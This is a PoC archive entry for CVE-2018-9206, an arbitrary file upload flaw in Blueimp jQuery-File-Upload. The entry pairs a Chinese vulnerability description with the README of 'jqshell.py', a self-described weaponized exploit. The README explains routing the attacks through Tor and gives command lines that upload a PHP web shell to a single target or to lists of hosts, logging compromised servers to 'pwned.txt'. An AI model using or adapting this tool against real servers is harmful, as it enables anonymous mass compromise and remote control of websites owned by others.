POC详情: 4ea09de0beffb22cf235084f38e14936b34e5e59

标题: Blueimp jQuery-File-Upload 安全漏洞 (CVE-2018-9206)
描述:Blueimp jQuery-File-Upload是一款支持多种语言的文件上传工具,它包括文件选择、文件拖放、进度条显示和图像预览等功能。 Blueimp jQuery-File-Upload 9.22.0及之前版本中存在任意文件上传漏洞。远程攻击者可利用该漏洞执行代码。
A weaponized version of CVE-2018-9206
![alt text](https://i.imgur.com/Gp4QkiN.png)


A weaponized version of CVE-2018-9206.


Using this agianst servers you dont control, is illegal in most countries.
The author claims no responsibility for the actions of those who use this software for illegal purposes.
This software is intended for educational use only.
No servers were illegally pwned in the making of this software.


*Single Target*
*Multi Target*


Please install these required packages.


pip3 install requests pysocks subprocess stem
**Tor Control Port**

To use tor, in this script, you must edit your torrc file and enable tor control port on 9051.

Typically this file is here: /etc/tor/torrc

open this file and change this line:

#ControlPort 9051


ControlPort 9051

restart tor service


usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
                  [-o OUTPUTZ] [-tor]

optional arguments:
  -h, --help            show this help message and exit
  -l LIST_INIT, --list LIST_INIT
                        Select for a list of assets to exploit
                        Single exploit target
  -s SHELL_LOC, --shell SHELL_LOC
                        This is required, put the fullpath to your shell
  -o OUTPUTZ, --output OUTPUTZ
                        This is full path to were you want to save your list
                        of confirmed hosts
  -tor, --tor_proxy     Select if you have tor installed, you will need to
                        enable control port

Running agianst single target.
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php
Running agianst single target, with saving output.
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
Running a list, with saving output.
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt

* **Joshua Whitaker** 
* *Twitter* [@_Stahlz](https://twitter.com/_Stahlz)
* *Email* - [stahl@stahl.io](stahl@stahl.io)
* *Website* - [stahl.io](http://stahl.io)


[4.0K] /data/pocs/4ea09de0beffb22cf235084f38e14936b34e5e59 ├── [8.1K] jqshell.py ├── [4.5K] misc.py ├── [4.0K] __pycache__ │   └── [4.8K] misc.cpython-36.pyc └── [2.2K] README.md 1 directory, 4 files
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